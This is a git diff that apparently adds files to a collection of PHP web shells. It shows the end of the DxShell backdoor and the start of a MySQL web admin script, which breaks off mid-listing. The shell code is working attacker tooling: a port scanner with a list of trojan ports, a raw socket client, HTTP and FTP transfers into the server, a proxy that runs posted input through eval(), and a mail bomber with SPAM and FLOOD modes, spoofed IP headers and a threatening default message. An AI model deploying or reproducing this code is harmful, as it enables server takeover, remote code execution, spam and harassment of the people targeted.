(UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',); + + if (isset($_GET['dxparam'])) + { print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>'; + $INDEXES=array_keys($DEF_PORTS); + for ($i=0;$i<count($INDEXES);$i++) + print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>'; + print "\n".'</table>'; + die(); + } + + if (isset($_POST['dxportscan'])) + { $OKAY_PORTS = 0; + $TOSCAN=array(); + + if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS); + else + { $_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']); + for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++) + { $_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]); + if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0]; + else + $TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]); + $_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]); + } + $_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']); + } + + print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>'; + list($usec, $sec) = explode(' ', microtime()); + $start=(float)$usec + (float)$sec; + for ($i=0;$i<count($TOSCAN);$i++) + { $cur_port=&$TOSCAN[$i]; + $fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']); + if ($fp) + { $OKAY_PORTS++; + $port_name=''; + if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port]; + print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>'; + } + } + list($usec, $sec) = explode(' ', microtime()); + $end=(float)$usec + (float)$sec; + + print "\n".'</table>'; + print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>'; + print "\n".'<br><hr>'."\n"; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0>' + .'<tr>' + .'<td colspan=2>' + .'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>' + .'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>' + .'</tr><tr>' + .'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>' + .'</td><td>' + .'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>' + .'<br><input type=submit value="Scan" class="submit" style="width:100pt;">' + .'</tr></table></form>'; + } + +######## +######## Raw s0cket +######## +if ($_GET['dxmode']=='SOCK') + { + $DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val')); + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">'; + print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>' + .' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=3>' + .'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>' + .'</td></tr>'; + print "\n".'<tr>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='HTML')?'CHECKED':'') :'CHECKED') ).'>HTML</td>' + .'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])? (($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>' + .'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>' + .'</tr>'; + print "\n".'</table>'; + + if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die(); + + print "\n".'<table width=100% cellspacing=0 celpadding=0>'; + print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>'; + print "\n\n\n".'<tr><td class=listing>'; + + $fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']); + if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr)); + + if ($_POST['dxsock_type']=='TEXT') print '<plaintext>'; + + if (!empty($_POST['dxsock_request'])) fputs($fp, $_POST['dxsock_request']); + $ret=''; + while (!feof($fp)) $ret.=fgets($fp, 4096 ); + fclose( $fp ); + + if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE; + + if ($headers_over_place===FALSE) print $ret; + else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place); + + if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>'; + } + +######## +######## FTP, HTTP file transfers +######## +if ($_GET['dxmode']=='FTP') + { print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>'; + + print "\n".'<tr><td>'; /* HTTP GET */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">'; + print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP DOWNL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>'; + print "\n".'</td><td>'; /* FTP UPL */ + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">'; + print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>'; + print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">'; + print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">'; + print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>'; + print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>'; + print "\n".'</td></tr></table>'; + + if (isset($_POST['DxFTP_HTTP'])) { $URLPARSED=parse_url($_POST['DxFTP_HTTP']); $request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $GETFILE=''; + while (!feof($f)) $GETFILE.=fgets($f, 4096 ); + fclose( $f ); + + DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE); + } + + if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL'])) + { $DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']); + if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];} + if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection')); + if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed')); + if (isset($_POST['DxFTP_UPL'])) + if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to upload')); else print 'Upload OK'; + if (isset($_POST['DxFTP_DWN'])) + if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to download')); else print 'Download OK'; + ftp_close($FTP); + } + } + +######## +######## HTTP Proxy +######## +if ($_GET['dxmode']=='PROX') + { + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0>'; + print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">' + .' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">'; + print "\n".'</td></tr></table></form>'; + + if (!isset($_POST['DxProx_Url'])) die(); + + print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n"; + + if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array(); + else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();} + if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array(); + else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();} + + $URLPARSED=parse_url($_POST['DxProx_Url']); + $request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) + die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $RET=''; + while (!feof($f)) $RET.=fgets($f, 4096 ); + fclose( $f ); + + print "\n".'<table width=100% border=0><tr><td>'; + $headers_over_place=strpos($RET,"\r\n\r\n"); + if ($headers_over_place===FALSE) print $RET; + else + print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place); + print str_repeat("\n", 10).'</td></tr></table>'; + } + +######## +######## MAIL +######## +if ($_GET['dxmode']=='MAIL') + { if (!isset($_GET['dxparam'])) + { + print ''; print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', ''); + print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">' + .'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>' + .'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">'; + print "\n".'</form>'; + die();} + + if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')'); + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>'; + if ($_GET['dxparam']=='FLOOD') + { print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.( (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM'] ).'" SIZE=10></td></tr>'; + } + else print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.( (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM'] ).'>" style="width:100%;"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.( (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.( (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>'; + print "\n".'</td></table></form>'; + + if (!isset($_POST['DxMailer_TO'])) die(); + + $HEADERS=''; + $HEADERS.= 'MIME-Version: 1.0'."\r\n"; + $HEADERS.= 'Content-type: text/html;'."\r\n"; + $HEADERS.='To: %%TO%%'."\r\n"; + $HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n"; + $HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n"; + $HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n"; + $HEADERS.='Message-Id: <%%ID%%>'; + + if ($_GET['dxparam']=='FLOOD') + { $NUM=$_POST['DxMailer_NUM']; + $MAILS=array($_POST['DxMailer_TO']); + } + else + { $MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO'])); + $NUM=1; + } + + function DxMail($t, $s, $m, $h) /* debugger */ + {print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;} + + $RESULTS[]=array(); + + for ($n=0;$n<$NUM;$n++) + for ($m=0;$m<count($MAILS);$m++) $RESULTS[]=(int) + mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'], + str_replace(array('%%TO%%','%%IP%%', '%%ID%%'), + array('<'.$MAILS[$m].'>' , long2ip(mt_rand(0,pow(2,31))) , md5($n.$m.DxRandomChars(3).time())), + $HEADERS) + ); + + print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.( (100*array_sum($RESULTS))/($NUM*(count($MAILS))) ).'% okay)'; + + } + +if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>'; +die(); +?> + diff --git a/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg new file mode 100644 index 0000000..e5ff040 Binary files /dev/null and b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.jpg differ diff --git a/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.php b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.php new file mode 100644 index 0000000..9f37027 --- /dev/null +++ b/php/PHPshell/MySQL Web Interface Version 0.8/MySQL Web Interface Version 0.8.php @@ -0,0 +1,1302 @@ +<? +/* +* MySQL Web Interface Version 0.8 +* ------------------------------- +* Developed By SooMin Kim (smkim@popeye.snu.ac.kr) +* License : GNU Public License (GPL) +* Homepage : http://popeye.snu.ac.kr/~smkim/mysql +*/ + +$HOSTNAME = "localhost"; + +function logon() { + global $PHP_SELF; + + setcookie( "mysql_web_admin_username" ); + setcookie( "mysql_web_admin_password" ); + echo "<html>\n"; + echo "<head>\n"; + echo "<title>MySQL Web Interface</title>\n"; + echo "</head>\n"; + echo "<body>\n"; + echo "<table width=100% height=100%><tr><td><center>\n"; + echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n"; + echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n"; + echo "<h1>MySQL Web Interface</h1>\n"; + echo "<form action='$PHP_SELF'>\n"; + echo "<input type=hidden name=action value=logon_submit>\n"; + echo "<table cellpadding=5 cellspacing=1>\n"; + echo "<tr><td>Username </td><td> <input type=text +name=username></td></tr>\n"; + echo "<tr><td>Password </td><td> <input type=password +name=password></td></tr>\n"; + echo "</table><p>\n"; + echo "<input type=submit value='Enter'>\n"; + echo "<input type=reset value='Clear'><br>\n"; + echo "</form>\n"; + echo "</center></td></tr></table>\n"; + echo "</center></td></tr></table>\n"; + echo "<p><hr width=300>\n"; + echo "<font size=2>\n"; + echo "Copyleft &copy; since 1999,\n"; + echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n"; + echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is +available<br>"; + echo "</font>\n"; + echo "</center></td></tr></table>\n"; + echo "</body>\n"; + echo "</html>\n"; +} + +function logon_submit() { + global $username, $password, $PHP_SELF; + + setcookie( "mysql_web_admin_username", $username ); + setcookie( "mysql_web_admin_password", $password ); + echo "<html>"; + echo "<head>"; + echo "<META HTTP-EQUIV=Refresh CONTENT='0; +URL=$PHP_SELF?action=listDBs'>"; + echo "</head>"; + echo "</html>"; +} + +function echoQueryResult() { + global $queryStr, $errMsg; + + if( $errMsg == "" ) $errMsg = "Success"; + if( $queryStr != "" ) { + echo "<table cellpadding=5>\n"; + echo "<tr><td>Query</td><td>$queryStr</td></tr>\n"; + echo "<tr><td>Result</td><td>$errMsg</td></tr>\n"; + echo "</table><p>\n"; + } +} + +function listDatabases() { + global $mysqlHandle, $PHP_SELF; + + echo "<h1>Database List</h1>\n"; + + echo "<form action='$PHP_SELF'>\n"; + echo "<input type=hidden name=action value=createDB>\n"; + echo "<input type=text name=dbname>\n"; + echo "<input type=submit value='Create Database'>\n"; + echo "</form>\n"; + echo "<hr>\n"; + + echo "<table cellspacing=1 cellpadding=5>\n"; + + $pDB = mysql_list_dbs( $mysqlHandle ); + $num = mysql_num_rows( $pDB ); + for( $i = 0; $i < $num; $i++ ) { + $dbname = mysql_dbname( $pDB, $i ); + echo "<tr>\n"; + echo "<td>$dbname</td>\n"; + echo "<td><a +href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' +onClick=\"return confirm('Drop Database +\'$dbname\'?')\">Drop</a></td>\n"; + echo "<td><a +href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; +} + +function createDatabase() { + global $mysqlHandle, $dbname, $PHP_SELF; + + mysql_create_db( $dbname, $mysqlHandle ); + listDatabases(); +} + +function dropDatabase() { + global $mysqlHandle, $dbname, $PHP_SELF; + + mysql_drop_db( $dbname, $mysqlHandle ); + listDatabases(); +} + +function listTables() { + global $mysqlHandle, $dbname, $PHP_SELF; + + echo "<h1>Table List</h1>\n"; + echo "<p class=location>$dbname</p>\n"; + echoQueryResult(); + echo "<form action='$PHP_SELF'>\n"; + echo "<input type=hidden name=action value=createTable>\n"; + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=text name=tablename>\n"; + echo "<input type=submit value='Create Table'>\n"; + echo "</form>\n"; + echo "<form action='$PHP_SELF'>\n"; + echo "<input type=hidden name=action value=query>\n"; + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=text size=40 name=queryStr>\n"; + //echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>"; + echo "<input type=submit value='Query'>\n"; + echo "</form>\n"; + echo "<hr>\n"; + + $pTable = mysql_list_tables( $dbname ); + + if( $pTable == 0 ) { + $msg = mysql_error(); + echo "<h3>Error : $msg</h3><p>\n"; + return; + } + $num = mysql_num_rows( $pTable ); + + echo "<table cellspacing=1 cellpadding=5>\n"; + + for( $i = 0; $i < $num; $i++ ) { + $tablename = mysql_tablename( $pTable, $i ); + + echo "<tr>\n"; + echo "<td>\n"; + echo "$tablename\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a +href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' +onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a 